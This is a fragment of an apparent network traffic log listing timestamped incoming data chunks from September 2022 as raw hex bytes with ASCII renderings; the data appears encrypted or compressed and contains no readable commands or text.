                                                                                                                                                            2022-09-29 12:45:07 UTC15288INData Raw: 0c 30 40 43 52 e5 31 bc 07 63 bf 98 2f f3 a0 27 90 a5 99 d6 f2 e3 e1 43 54 0f 51 44 0f 8a 74 8e 75 9d a6 fe 8a 64 93 20 a9 7a fd b4 ea 61 62 29 3c 2a 9b 67 10 52 68 47 15 29 3e e8 c2 5f ce c4 d4 c7 b6 b6 3a b4 f7 80 6d 93 eb dc 82 e5 bb 7e 4b ca 42 92 1c e4 6e 29 6c ed e7 f9 fb 03 a2 70 0d ea 81 43 6b 4b 05 6d dd e7 54 8b e3 54 fd 43 cd c6 62 e2 db f4 a7 bc 9d f2 85 87 cf 90 66 b8 10 cb 80 e7 82 77 84 03 5f d9 d0 3d 3a c2 10 72 fa 55 7c 07 bb 43 74 67 f0 93 f4 2a a1 4b de 1e 84 5d 8f f8 d7 16 79 6b 45 a8 4c 49 17 c8 83 5b 2b eb 56 f2 f0 02 6c b2 7c 31 65 a6 ad 64 d3 49 36 e7 71 d8 c9 54 09 58 82 df 69 14 65 28 d7 94 7d a4 47 e8 db 2b 74 22 5d b9 20 a4 ff 64 a8 df ae 93 1e c1 be f4 01 00 64 09 e0 34 f9 73 72 c7 7c d6 00 0e 35 0f 21 d1 d2 46 c4 9b c3 bc 86
                                                                                                                                                            Data Ascii: 0@CR1c/'CTQDtud zab)<*gRhG)>_:m~KBn)lpCkKmTTCbfw_=:rU|Ctg*K]ykELI[+Vl|1edI6qTXie(}G+t"] dd4sr|5!F
                                                                                                                                                            2022-09-29 12:45:07 UTC15304INData Raw: 80 4a 8d 86 82 cf ad 21 b7 01 a3 68 35 70 b4 a6 0f c1 fc 2a 0b 58 37 72 bf d8 cd 9a 34 a4 b3 d1 de c6 17 36 c2 d5 59 a1 51 78 98 78 0f cd 4d 2a 7c a9 1b ad 5b 1f 50 18 42 94 d0 a0 0f 40 ca 15 b5 d5 29 bd b5 05 3d 71 79 a6 ed 2b 59 b7 2e 10 fe 1a 3d 6e a6 b5 4b db fc 44 99 94 71 ef 16 55 4a 6d ba ce b6 50 a9 28 ea 5e 87 48 73 f5 9f ec fe e7 df 4c 09 80 38 a1 ec 20 e2 11 30 7a 05 19 4e bf 49 fb ac 6d f4 1e df bd c1 6c f7 25 cc f1 bd 7c b7 eb 3a f8 3d 99 c3 f6 bd 69 c7 3f d3 f6 1c 96 f0 04 f6 50 fe 25 99 a5 d1 a2 a9 e8 29 71 9a ac 00 b8 89 82 cc 40 4f b8 05 30 9d a9 ca 1e d3 ae 38 fa e6 f3 00 ac 5f dc 3e 33 7c 16 11 94 72 f4 8e 30 82 59 a0 b8 a3 d0 f5 b5 14 58 88 94 c6 79 79 42 0e a7 44 f7 f1 4a da 67 dc 20 12 52 0c a6 f6 58 61 87 83 c3 c9 4f 63 f0 8b b8 60
                                                                                                                                                            Data Ascii: J!h5p*X7r46YQxxM*|[PB@)=qy+Y.=nKDqUJmP(^HsL8 0zNIml%|:=i?P%)q@O08_>3|r0YXyyBDJg RXaOc`
                                                                                                                                                            2022-09-29 12:45:07 UTC15320INData Raw: 60 b6 c8 f2 ee 3a c8 76 23 8b 19 a0 32 60 cb eb 6d b4 62 46 85 e1 87 c6 2e 5a 03 9f a5 c4 ae 69 5b 1d 31 64 52 94 62 2b 5e 03 ad d5 3f 63 34 e4 01 83 68 9f 58 58 1c 70 52 63 0a ff 6f 97 10 22 9b d5 c7 d6 33 14 97 4a 90 16 a2 0f c7 32 d7 91 57 61 3e fe be 5b 78 ee 06 72 90 39 fe cb 85 ab e8 4d 96 84 23 60 2c b2 66 46 ba 8b 76 e6 40 86 74 00 8f c9 e1 28 df 7a 8b ed 35 44 ee 67 81 45 f0 7c 53 04 61 47 02 13 97 15 41 e6 f2 ff e8 17 e9 21 e7 16 eb 0e e9 11 4b 3c fa 53 b1 93 40 23 36 53 f9 9a c7 ba 7d 17 7c 9b e0 26 c0 6d ba ff ca b0 df 7f cb 05 21 a9 47 e8 aa 24 d3 58 08 f0 65 2e 28 88 64 4e 78 bb 2a a0 d7 ca f0 d9 69 48 3d e5 ff 25 e6 bf be d2 8d dd 19 de 62 2c 86 3c b6 24 0b f0 38 0b 12 89 78 cb 83 85 ac c0 35 ac 7f 98 8c 3e 4c 32 6e 16 c1 a0 63 ce c9 ad 6e
                                                                                                                                                            Data Ascii: `:v#2`mbF.Zi[1dRb+^?c4hXXpRco"3J2Wa>[xr9M#`,fFv@t(z5DgE|SaGA!K<S@#6S}|&m!G$Xe.(dNx*iH=%b,<$8x5>L2ncn
                                                                                                                                                            2022-09-29 12:45:07 UTC15336INData Raw: 50 bf 83 aa 66 85 fa ec 17 90 85 c5 e2 77 ac 1f 5d 4a 87 51 e3 a6 b1 a1 23 46 61 23 56 d9 f6 98 8b db 10 99 38 31 d5 a8 c6 9d 49 4a 77 9c 53 77 c9 99 70 4a 09 ac e7 b2 9d 4c d0 70 d3 6d b5 0a 7f c5 31 f0 4e 2f d6 78 d2 9a 3e 63 74 85 c1 ff fa 72 da 72 5e 1f 3f 86 0d 05 f4 22 a4 ee 54 ab 36 02 db 6b 2e 08 4c 9c 3f 73 fc 27 c2 f6 8b 95 f2 47 13 38 37 58 26 5d c7 83 86 3e 07 cb c4 14 22 73 cd d9 29 75 bb 6d 41 7b 01 b6 e5 21 39 96 d9 53 c0 4b 7a b2 3c a5 69 cf 46 17 f2 1c 69 92 e9 5f 35 32 48 d0 97 2c 23 17 19 b7 4f f9 fe e6 0d e4 f9 a4 63 04 03 a5 53 ef b9 2a 28 47 b5 18 5d e8 68 d2 31 fa 88 5f d8 78 99 a6 fa ee 2e 7b a6 2b 7a b3 a4 c4 dc 85 bf 4d c8 e3 43 92 39 53 d9 bd d4 33 87 44 88 a8 d3 25 b6 bb 89 ad a1 d2 05 23 bc e3 a0 0c 33 2f ae f4 38 5c 9d 26 ea
                                                                                                                                                            Data Ascii: Pfw]JQ#Fa#V81IJwSwpJLpm1N/x>ctrr^?"T6k.L?s'G87X&]>"s)umA{!9SKz<iFi_52H,#OcS*(G]h1_x.{+zMC9S3D%#3/8\&
                                                                                                                                                            2022-09-29 12:45:07 UTC15352INData Raw: 85 f2 48 c4 a6 f3 2b b2 c4 17 09 f8 ed c1 13 24 9c 5f 7e 23 b8 1c c1 33 62 74 31 f6 28 23 8e 49 e2 64 81 d4 e7 04 84 b5 b3 81 7c ae c1 28 ce ed 4d 34 e4 02 b4 c4 8e 57 b4 6d 2d a9 cb 80 aa c3 04 e2 d8 ad b1 ad 36 e5 61 55 ed 03 80 3f 9a 11 d0 5a a5 b1 f7 d4 c8 17 e8 f6 c1 c1 36 5c 68 c1 15 5d cc 52 d7 cf 2b c6 53 17 9e e0 bc 54 31 ca 17 9f e2 63 a7 6d c6 7e 07 83 bd ef d9 a3 cf 80 eb 76 25 4a 82 fe ba 43 79 f2 ec b4 93 69 52 d8 32 09 66 f5 ad 6e fd ab 21 ec a5 16 f0 fa 0a 82 81 e2 5c 90 24 cd 83 1c 73 66 5e a9 f8 ac 8c 50 53 96 41 e7 63 54 ad 6e 9e b4 88 59 2c 3d db 18 67 c8 f2 0f 74 45 46 ca 38 21 93 d2 dd 84 78 2d 85 b3 9d 61 ed 88 d1 bd 2c d5 70 c7 32 7a fc 7e d1 59 7a e7 c6 dc 99 96 49 1b f1 97 fc 2a 22 0c 91 19 4c b5 f1 42 5d 13 73 85 5a 87 a4 bb 0d
                                                                                                                                                            Data Ascii: H+$_~#3bt1(#Id|(M4Wm-6aU?Z6\h]R+ST1cm~v%JCyiR2fn!\$sf^PSAcTnY,=gtEF8!x-a,p2z~YzI*"LB]sZ
                                                                                                                                                            2022-09-29 12:45:07 UTC15368INData Raw: b8 00 2b 57 fc 1c f4 0f 3b c8 6f 06 da e5 dd 8c 9c 3f 0b 43 b6 4a 46 01 d9 45 c2 3a 37 dc 34 9e 9c aa b7 8c 80 11 5f ba d8 2c 2a fa 65 e5 b1 eb 81 fc 62 da 18 52 1e 9b 09 39 eb ef 49 28 73 b0 98 c6 9d db c4 03 e1 e5 b5 83 9d e4 70 83 02 6b 93 2d 9c ba cf 45 d2 e1 0c 33 55 0a 12 82 41 89 45 6b b3 4d 51 28 ef 38 3b 99 4c 7e 4e 80 b3 22 c5 78 b4 44 26 e3 27 24 73 7b 83 8a 04 34 c6 e0 39 f0 59 4f 47 32 b4 55 14 76 ec 76 a5 74 30 f0 30 8c d7 49 98 a3 a2 97 9c 61 31 4e 5d 06 22 24 5b d1 b7 d4 6e 4e 5b 40 5e 61 a9 d2 65 89 f7 95 72 40 f6 bb 95 fb c1 32 7f 27 78 0a dc 39 f6 85 2f 43 7a b3 7d 5a 87 fc 19 cb 66 2f 18 6e 9d 5b da c6 65 b4 10 ea 70 39 37 f9 04 b2 25 48 17 e0 6a 61 f6 2a f8 3b 8f f3 a9 7c 8f e9 c0 d9 56 58 7a c5 0e 53 42 67 3d c3 45 db 84 d9 24 66 70
                                                                                                                                                            Data Ascii: +W;o?CJFE:74_,*ebR9I(spk-E3UAEkMQ(8;L~N"xD&'$s{49YOG2Uvvt00Ia1N]"$[nN[@^aer@2'x9/Cz}Zf/n[ep97%Hja*;|VXzSBg=E$fp
                                                                                                                                                            2022-09-29 12:45:07 UTC15384INData Raw: 35 05 ad 86 78 5b b9 88 9a 71 7d 06 44 10 c9 52 4d 70 61 f4 d5 63 cd cb b0 78 ee a2 e7 43 9b b9 53 ad 8b 11 79 1b af 82 68 6f 65 ad e4 c8 b5 e1 f3 52 a2 c5 54 89 63 ae b0 92 53 12 1a f5 4f 13 11 ee 3b 50 22 d7 18 94 5c 8a 41 3c 16 43 c5 cf 9a cd 74 19 c8 d6 9a 7b 55 21 e2 6e 80 5e fc 7b 51 85 ef 89 54 82 40 53 f2 85 54 d6 79 e3 f1 4f 7e ea ee 8e 27 02 a7 d3 65 9d 27 c4 c7 45 27 24 0a a4 79 e3 d1 fe ba ca 9c 2d 62 9a 6d 3e ce 32 90 80 ca 74 09 54 bf 92 28 7e 50 53 a4 ea df dd 80 2a 17 f6 38 04 3f cd 12 8b 5e d3 87 00 7b 8f f3 c3 5e cb 64 ee ff 02 b6 5b 5b 3c 09 12 45 7b 04 38 7c 43 01 ed 24 36 35 4c 17 c1 77 35 57 a5 d4 72 82 6f 7b 8a 96 bc ed 8f 11 38 e5 e4 91 bd 65 4a 41 ef 37 c8 0c 20 12 fe 05 94 32 6b 54 bc 96 0d d3 5f 28 66 38 ed 1b 1d 72 94 1c c3 be
                                                                                                                                                            Data Ascii: 5x[q}DRMpacxCSyhoeRTcSO;P"\A<Ct{U!n^{QT@STyO~'e'E'$y-bm>2tT(~PS*8?^{^d[[<E{8|C$65Lw5Wro{8eJA7 2kT_(f8r
                                                                                                                                                            2022-09-29 12:45:07 UTC15400INData Raw: ed 04 68 94 90 f6 b1 a3 4d 90 54 6f 75 bb e5 43 a0 1b 6e 89 78 99 58 9d 08 1c 35 65 4c 41 fd 87 62 2a 62 24 43 c6 8d c2 1f a5 10 49 f4 23 94 94 af 10 74 b2 6b 7b 9d ff d2 a9 00 f4 b7 aa 49 29 d1 05 35 b8 12 a3 4a 84 e5 8d 4c 0c 56 52 45 80 9f 1c e2 4d 31 b7 df 66 05 4d c7 38 2d e6 a4 5e 72 5c b9 92 4e 6d 20 9e 38 e3 00 50 6f 71 19 da 0a 35 a8 b9 0f aa c9 54 00 05 8c 67 37 ba 6f 7e 73 b5 49 89 75 41 86 56 1d 44 39 3d 7d 4f 3f 21 8f 0b 19 55 bc c7 05 2c e8 8e 0c b3 34 a9 93 fe df f8 13 cd cc 6c fb be 0c d5 2d 60 f0 b9 49 b1 1d 14 8c a0 70 af 46 07 1d bc de e0 8b a9 b7 1a bc e4 bd 48 46 d4 c0 cd 12 ce df e2 cc 29 4a 96 f1 35 b2 68 42 66 86 8a 62 f8 2a b9 48 74 83 39 53 5b f3 6c 5d 03 7d 3e 39 63 bb 21 4c 68 d8 66 15 da 53 f5 1e 9a cb 48 a5 a6 62 c4 9a 80 e6
                                                                                                                                                            Data Ascii: hMTouCnxX5eLAb*b$CI#tk{I)5JLVREM1fM8-^r\Nm 8Poq5Tg7o~sIuAVD9=}O?!U,4l-`IpFHF)J5hBfb*Ht9S[l]}>9c!LhfSHb
                                                                                                                                                            2022-09-29 12:45:07 UTC15416INData Raw: 2b bc c0 d2 e8 ac d8 e6 54 e3 aa f8 32 d0 12 e1 2b 61 e7 9f 0e 61 ee 60 a3 63 3a 62 84 d7 6f a9 fd ce 1c 84 8e 51 eb 7c 9a 2f 69 d8 7f e9 b2 d2 2c f3 47 e0 5d 60 87 68 b7 9c eb 12 f1 0c fd 73 b4 e9 d4 d3 af 71 d6 41 05 9e d1 3a 02 2a f8 e1 53 10 d2 4f b4 ee 6d 43 19 13 88 68 f6 5d 1a f6 06 bf d7 27 24 4b 72 88 4e d3 a5 ae 13 a0 1f b2 5a 8f 82 d9 fa 66 b6 11 7c d8 0a 35 0c a4 49 ad e9 0e 81 bc 8a 38 ae bb 93 78 08 f9 c9 ad 21 dc 02 e2 eb 38 4d 8c 3c 04 d9 d6 eb 32 d1 33 37 b2 e6 2e ef 17 82 f5 fe 16 fd 8b 5b 84 42 c2 5c 52 14 69 d8 6b e7 74 cf 41 2c 28 76 f2 e4 37 74 da 14 99 06 a0 35 aa 3c 04 c8 31 7d 3c 38 63 7d 47 31 aa d0 44 c3 85 de 55 84 60 56 f0 0f 5f 85 e6 68 97 5e 74 81 6a c6 b0 8a 8c 3f 2c d9 59 09 13 66 88 bc 38 17 8e 16 e5 47 95 0b ae 1e 75 fb
                                                                                                                                                            Data Ascii: +T2+aa`c:boQ|/i,G]`hsqA:*SOmCh]'$KrNZf|5I8x!8M<237.[B\RiktA,(v7t5<1}<8c}G1DU`V_h^tj?,Yf8Gu
                                                                                                                                                            2022-09-29 12:45:07 UTC15432INData Raw: 5c 52 6c 19 9c 8b 18 9c 74 36 83 f2 f9 7e bb ea c0 96 6a 67 30 2d 61 1e d2 05 06 48 9b 80 c3 f9 b9 a0 58 55 c8 9e 26 4a 6a 8f a4 bc 0c e4 05 19 51 58 b6 5c ab 35 03 7b 97 3d e4 6c c9 57 d5 3b ba 18 57 07 7c d7 3c d5 c8 33 7d f6 2e 3b f0 c3 75 49 b5 62 63 ee 43 36 4e 41 5f 5c af 2c fc 9b 0b 78 3f 48 3d b4 e0 a3 c6 93 53 1f fe 44 46 83 ea 29 9e 09 a0 98 d4 0b 0a 65 71 bc 58 14 90 41 4e 85 79 67 a9 ad 7f 41 aa 57 9a a7 77 7b 28 0b b4 4f a6 b9 87 fb 4f 66 e2 1f 94 c9 0c 1d 71 67 b3 9a eb d0 12 9f 55 9b 35 78 94 d1 16 eb 44 7c 43 10 87 f9 88 6f 58 fb 80 7a d2 80 98 90 79 65 1a ea e3 ea 7f 11 e6 ee 54 2e 53 5a 04 b7 b4 1a 90 01 0e 4a 59 b4 e6 89 84 e0 9d 38 5d f4 a0 db 7d 5e 76 60 0b db 6b f9 00 8a b1 e3 a6 21 de 37 eb ae b2 f3 69 40 ca 82 98 d8 4e 79 3c ba 7a
                                                                                                                                                            Data Ascii: \Rlt6~jg0-aHXU&JjQX\5{=lW;W|<3}.;uIbcC6NA_\,x?H=SDF)eqXANygAWw{(OOfqgU5xD|CoXzyeT.SZJY8]}^v`k!7i@Ny<z
                                                                                                                                                            2022-09-29 12:45:07 UTC15448INData Raw: 44 2d e1 1a 12 2c 3b fa 53 a6 86 07 41 da b8 3c 41 73 71 8d f6 81 bd 60 0d f8 f9 5a 66 0e d1 d4 88 94 ac 09 51 57 dc 9b 7b 4e 76 cd 5e 6c 2e 43 0e d0 ee c6 30 b4 98 38 4b 49 71 9c 48 df 04 c8 f0 d9 fe b6 eb 0e 61 77 01 4b e6 bd 02 d0 e8 9d 8a 3f c9 20 9d 83 03 46 c5 ee e1 2c c6 84 0d c4 50 90 64 e7 55 53 e9 30 46 48 71 e1 34 50 8a 97 c1 6e 0c be b1 78 7c 62 65 7f ab 5b 03 f0 02 59 da 09 4b a2 32 25 f9 bc 7d 67 0b d2 ac a0 9d 41 93 28 58 8e 24 55 a5 f8 95 5f f7 54 ab 18 53 b4 7b 39 2b 69 a6 40 dc eb 4a 2b 00 bd 83 7a 20 16 42 1e 98 22 59 52 8f b0 b9 c3 40 03 a8 42 6a 11 5a 39 41 a0 a4 32 54 f3 2d 49 8f 49 3b fd a0 91 aa eb 1f 1a 6f 0a 23 0d 2c d3 f5 46 fd 1c a3 5d d0 5c a0 c5 e1 13 3c 86 ff e5 55 88 d6 38 d7 5a ff 87 ef a9 ae 65 de cd f8 59 33 16 a0 29 4a
                                                                                                                                                            Data Ascii: D-,;SA<Asq`ZfQW{Nv^l.C08KIqHawK? F,PdUS0FHq4Pnx|be[YK2%}gA(X$U_TS{9+i@J+z B"YR@BjZ9A2T-II;o#,F]\<U8ZeY3)J
                                                                                                                                                            2022-09-29 12:45:07 UTC15464INData Raw: 80 53 36 1d 4c 95 f3 4a e7 fe 88 72 8c bb d6 f9 21 d0 ee 2a 41 44 58 a5 bf e9 f8 1f 41 08 76 a6 3c eb bc 10 85 3d 54 b4 a4 42 77 ce 98 9a 09 e9 1a e4 9b 22 fd cb 9f 71 54 dd 2d 7a a8 ee b8 16 f9 e7 35 ad ea 4e 68 4d 29 f7 a2 4c 61 89 53 1f 7c 0f 57 52 5d 7c 37 6b 8b f0 88 5e cd d4 f8 05 a9 cc 69 b8 d4 e8 94 21 8e de 15 a9 19 f8 fc 67 38 7a e3 53 d4 25 48 78 83 f1 1f 4d b9 fb 26 b9 ff 69 0d 01 9d 72 df 4c b9 3d a9 b8 2a 0c f8 c2 69 50 15 be fd b2 be 3f 7d f8 12 39 30 99 8f c7 ed bb 50 99 b8 91 dd a4 ed a2 2c 88 24 50 08 e1 59 d0 df f7 b9 6a 8c d5 0d 9e 94 c3 ea 2d 35 a4 2c 81 62 fb 0b 75 de 23 20 01 c6 ff cd 4c c3 33 ed c8 e9 e5 a9 71 48 b3 9c dd d2 70 ed 4e 8e b9 da f6 b4 c0 5a c6 a2 1d 5b a5 db 3b 24 51 43 e2 7b af 3e d9 e6 8e 07 52 a9 4b 20 e4 66 ab 4c
                                                                                                                                                            Data Ascii: S6LJr!*ADXAv<=TBw"qT-z5NhM)LaS|WR]|7k^i!g8zS%HxM&irL=*iP?}90P,$PYj-5,bu# L3qHpNZ[;$QC{>RK fL
                                                                                                                                                            2022-09-29 12:45:07 UTC15480INData Raw: f5 b7 10 5a bc 5e d8 9a 27 79 f5 bf e4 aa e2 db 6b f9 42 38 d5 6e 88 ec 18 28 6a c5 79 9d 13 1c c6 ee 15 6f 5e 84 18 f5 ea e5 c1 da df f8 e1 01 7c cf de b8 7a 14 36 df fe c8 72 d6 cc 50 0a a7 5f f5 55 b2 d4 19 d6 d3 fa 3f f3 b8 8b ff 1f f1 72 dc 92 f0 45 56 09 2e 54 e2 13 7b 02 26 c5 6a b9 13 7e ad 9d 28 6b 68 a5 70 0f 5e 5e da 25 8d c2 2e 1e 0e 66 8a 6c e8 54 0f b8 56 72 89 69 0f 07 5b 8f 26 47 9f 61 d2 fe 55 54 94 47 67 99 00 04 08 39 25 d4 94 f5 46 90 22 f2 ac 3c 04 bd 39 5f c8 29 d0 7d e7 9e 1e 60 b0 0a e3 5d a4 95 45 b3 a6 51 38 95 72 08 52 5e 19 78 fe f4 5e e6 57 90 5d c0 21 68 2a 83 76 9a 5b b1 41 12 dc c9 57 3e eb b8 c3 78 ee 41 6d 25 40 72 6b 12 d5 e3 67 a2 55 40 21 8b 4d ac 72 a0 27 4e f5 b3 57 31 0b f2 32 ce c0 f3 71 9e 3d 02 61 fb 98 bf 0e b4
                                                                                                                                                            Data Ascii: Z^'ykB8n(jyo^|z6rP_U?rEV.T{&j~(khp^^%.flTVri[&GaUTGg9%F"<9_)}`]EQ8rR^x^W]!h*v[AW>xAm%@rkgU@!Mr'NW12q=a
                                                                                                                                                            2022-09-29 12:45:07 UTC15496INData Raw: 8b 42 6a 54 a0 15 4f c8 b5 63 e4 d4 4d 7a f0 88 eb cd 77 c7 68 00 e7 65 ee f0 89 56 79 2c 3a f8 66 5f 35 f3 29 d3 73 9b 50 67 ac eb 2f c9 22 7a 8c 1c 41 fa b6 e3 2f 7b 20 90 30 a2 46 a0 f4 86 a8 da 91 17 3e ad 82 13 03 56 2b 6a af 78 24 b3 d6 d0 a6 b2 6c 5c 0a 1f b1 84 4b 0b c1 de 41 f9 4b 4b fb 26 8f 9b d5 14 9e 46 38 33 c6 21 73 b9 44 63 4a e8 ef 6f d4 68 1a ac c5 52 5c 28 de 36 8f 6c 57 0b db 19 23 fd 0a bb 06 56 85 3f 48 ea 3f b2 8c 2a 7c 8c a8 6d d7 84 46 0e 19 36 54 d4 47 81 a8 95 e0 27 8f 00 c6 1e 2a b6 97 2b 3b 9f 0d da 7c b5 05 44 a7 9d 8a 5f 1c cf b7 cc 4a 6f ee de 2d eb f8 86 0b 30 7d b1 5b cd cb c8 aa da fc 10 18 28 42 66 c5 32 89 de a3 13 16 c8 f3 eb a3 4f 5b 62 34 10 79 b2 66 fb 15 db 84 4c 5c de 7f e4 6e d6 b7 ab 58 95 ea ec 7e 8b dc ad 56
                                                                                                                                                            Data Ascii: BjTOcMzwheVy,:f_5)sPg/"zA/{ 0F>V+jx$l\KAKK&F83!sDcJohR\(6lW#V?H?*|mF6TG'*+;|D_Jo-0}[(Bf2O[b4yfL\nX~V
                                                                                                                                                            2022-09-29 12:45:07 UTC15512INData Raw: 1f 38 87 7d ba a8 c3 f1 55 1f 27 6a b6 41 ee 74 ed c4 cc cb fe ae 78 f0 f4 0e 89 9a 27 ed 82 63 20 89 c1 63 ca 24 ba 7c 63 da de d7 bf 85 a4 76 f8 4d 99 9e ec f6 31 92 e2 c7 91 81 da dc 58 28 67 5d 26 37 75 1e 70 3f 6d f4 67 79 2b c3 2f 96 9b 61 e6 26 54 1f eb 60 56 06 e5 09 1b 12 85 bc fe 7d 75 12 44 b7 b7 45 e0 da a5 63 cb 32 87 31 90 eb d7 42 f3 8e 18 64 d5 ec db 90 f9 93 57 64 59 e1 6b e1 6f 2d 03 06 a8 74 c9 d5 6f 5d 90 30 33 35 fc 1b 04 9e c8 a2 52 1d 46 ac 01 7a 92 73 80 30 ff 14 a7 7f b6 80 fc 70 8e 2f 85 42 f3 e9 2a 90 87 f0 ce 49 2c b0 4c 96 b8 de a8 4d 98 3f f1 8f d0 b5 55 68 0d f0 ac cf e2 92 45 2a 1f e8 e3 22 24 0d 4e e5 fc f2 d1 ef e8 f7 ea cc 9e 3b 1a 36 84 15 66 cd 5e dc cd f1 da 4e 48 0d 7e ce 87 f6 60 0e 3d 8b 31 d7 48 cc f9 e4 a4 a4 4f
                                                                                                                                                            Data Ascii: 8}U'jAtx'c c$|cvM1X(g]&7up?mgy+/a&T`V}uDEc21BdWdYko-to]035RFzs0p/B*I,LM?UhE*"$N;6f^NH~`=1HO
                                                                                                                                                            2022-09-29 12:45:07 UTC15528INData Raw: d8 78 34 c2 0a a6 85 cc f0 b2 5d c6 31 d0 b8 c7 ef 6d 81 24 fe 08 99 cb 8c 7c 54 6b 2e 17 fd 52 1d aa af f6 64 c9 55 16 56 c9 ab c8 e5 a2 71 28 1b e0 b3 ef cf f8 d9 15 e9 7b ad cf a0 0a 35 18 82 a2 0c 9f f0 40 cc 80 ef d6 e3 40 4a 15 74 e2 31 63 77 79 3d 3d 46 ff f1 b6 a3 47 ad 53 48 f8 42 49 3a 94 fa 16 a3 f1 cf 81 73 53 fe 2a 1c 0d c0 46 6d 95 c5 77 94 94 28 c5 fd 6a 5b ea d7 d6 23 cd 04 1a 82 f6 b2 3e 2e 26 fe c3 8f 7b df 60 31 42 45 14 00 10 8e d7 7b db 5b 7f 32 a2 97 a1 1e 39 e1 c9 85 28 07 75 d3 31 a6 71 60 2b 50 6b 94 a5 18 ff d5 dc 50 79 68 da 8e e3 16 7d c1 ba 7b 94 da 23 54 1a 5a 1b da 6e ce 81 b0 cc db a1 1e 28 cb 56 a3 f6 c3 2d 83 5d c3 f9 7c 17 fb ed b5 0e 92 52 41 79 01 c4 db 74 52 1b 87 13 28 97 37 6c 41 4e e9 9a 58 54 d4 c5 0b 00 77 62 35
                                                                                                                                                            Data Ascii: x4]1m$|Tk.RdUVq({5@@Jt1cwy==FGSHBI:sS*Fmw(j[#>.&{`1BE{[29(u1q`+PkPyh}{#TZn(V-]|RAytR(7lANXTwb5
                                                                                                                                                            2022-09-29 12:45:07 UTC15544INData Raw: 81 a4 ff 96 ac a5 35 b6 c7 75 d1 d1 ec e0 b6 5d 35 bf e7 a9 de 5f 9b 82 b5 2e 53 62 9d 27 2b a1 8b 75 19 08 24 62 ba 36 ca 27 dd b7 4f a8 48 9e ff 99 24 38 5a 09 ca e1 a9 3f bf 0b 55 f7 71 78 f4 33 5c e3 c5 45 01 ef 9e 5e 5d 5d 16 e6 c0 2b a1 d4 38 d2 f5 14 99 48 7d 24 e8 ce ad 35 91 ca 1e 82 ea b1 cd 3f 8a 51 39 46 85 de 13 eb a1 46 6e 5f 19 03 24 ba af 15 97 75 a2 08 83 ef a3 7e 24 6a 75 e7 23 42 fb 93 3e b4 84 a1 2b 91 92 fe 58 a7 ae 9c aa 22 3a 5f cb f8 5e 65 a9 03 25 1f ca c7 00 a3 28 91 1c 07 07 5f 41 af cc 8d 75 fb 38 16 0d 73 bb 45 de 12 0e c5 db 30 78 e7 4d fd 91 a3 ba 85 78 e6 fa 98 8a 55 ba 5f 3e 44 ec e5 e0 6f 07 ea a4 2c 33 88 35 f2 55 82 75 66 25 b9 15 99 d1 56 c1 11 4b 40 4f e1 be fa 65 9a c2 c4 54 6e 82 5c 24 b7 5f ca 98 5a 0b 6f f4 f3 46
                                                                                                                                                            Data Ascii: 5u]5_.Sb'+u$b6'OH$8Z?Uqx3\E^]]+8H}$5?Q9FFn_$u~$ju#B>+X":_^e%(_Au8sE0xMxU_>Do,35Uuf%VK@OeTn\$_ZoF
                                                                                                                                                            2022-09-29 12:45:07 UTC15560INData Raw: c9 d8 64 91 e7 96 95 f3 ab 5c 53 bf e0 28 43 26 ac ff a1 5b 61 e3 5b 80 57 83 28 5c 4a f8 f4 04 c0 f6 86 d1 da 56 39 94 89 78 f2 04 71 08 e3 c7 c5 f1 bd 9a a4 4f ef 70 40 fb 4e 07 a3 fb e1 00 26 76 62 d8 e7 77 a5 f8 48 3f a8 f3 0b 01 f4 b0 fa 57 30 00 ad 22 17 6e 4c 74 19 ec d3 11 89 29 2c 3d 8a f5 84 07 01 63 a2 88 b7 d6 8e 1d c9 66 36 ae 43 47 ae 9f 67 9b b8 b8 09 61 e2 50 ec 8d 3a 2d f8 41 8b 6a c3 a3 8a b2 f4 f7 a8 1f ac 70 ac 99 30 48 0c b2 49 aa 4e bc e5 f3 42 72 b0 14 83 58 c9 b7 70 d6 98 e7 48 42 24 f1 a2 32 bf 59 af b3 40 5e 30 27 62 e1 bf f4 d9 50 19 fd f3 ee 0c 9d b5 3e bc d1 0a 7b 77 74 b5 dc d4 cf 88 02 c5 ed 74 f1 18 b7 92 f9 ca 29 ae f0 32 6e a0 f6 8d 68 57 8f 60 62 0b 5f 27 98 cd 6c 4d f4 6b fd 0f 63 b1 45 57 44 cb bc 7e 29 2a df 43 c1 37
                                                                                                                                                            Data Ascii: d\S(C&[a[W(\JV9xqOp@N&vbwH?W0"nLt),=cf6CGgaP:-Ajp0HINBrXpHB$2Y@^0'bP>{wtt)2nhW`b_'lMkcEWD~)*C7
                                                                                                                                                            2022-09-29 12:45:07 UTC15576INData Raw: 1d 99 d3 19 db 54 29 bc 09 ff 06 65 93 28 6c 03 c0 db 79 10 6a ec 94 0b d8 a8 6c a9 e4 fa bd 23 0c 95 ce ab 3b 56 39 2b ce 7e a3 00 25 37 20 74 32 08 ab 07 41 70 6d 38 5f e5 a4 01 2c 96 1e 84 29 da 7d dd 61 26 b8 6a b9 be 26 6d 90 48 61 7c 7c 24 27 2a 09 1f e2 2f 13 40 98 e4 fc 34 16 a4 b4 f7 f7 3d ea dc 38 41 82 72 4f bb 6b 3a 72 c3 d7 3f 7e 9f 9b db 20 eb ee 69 f4 a3 15 97 4b ca e8 45 a2 87 98 d8 35 9c 91 94 fe 6f dc e8 f6 2d 94 c6 39 50 b0 66 1a 37 d3 51 2d 75 e4 be 0c 39 67 f8 1e 06 63 93 0b 59 ca d0 f5 e3 cc 64 39 1c 37 11 77 12 b7 b8 56 51 a0 fd ba 7d be e8 80 14 72 6a 60 3f c3 31 fc 57 46 79 47 7d d0 e0 0a a8 ff e3 be 58 1e df b2 8d 82 a9 0f 20 e4 f3 9e 82 92 0c b4 4c b6 74 08 77 7b 0b c5 8c 0c 3f 21 8a 95 d8 ee d9 f3 fc aa a5 cf 2e 9c 0b d9 14 6c
                                                                                                                                                            Data Ascii: T)e(lyjl#;V9+~%7 t2Apm8_,)}a&j&mHa||$'*/@4=8ArOk:r?~ iKE5o-9Pf7Q-u9gcYd97wVQ}rj`?1WFyG}X Ltw{?!.l
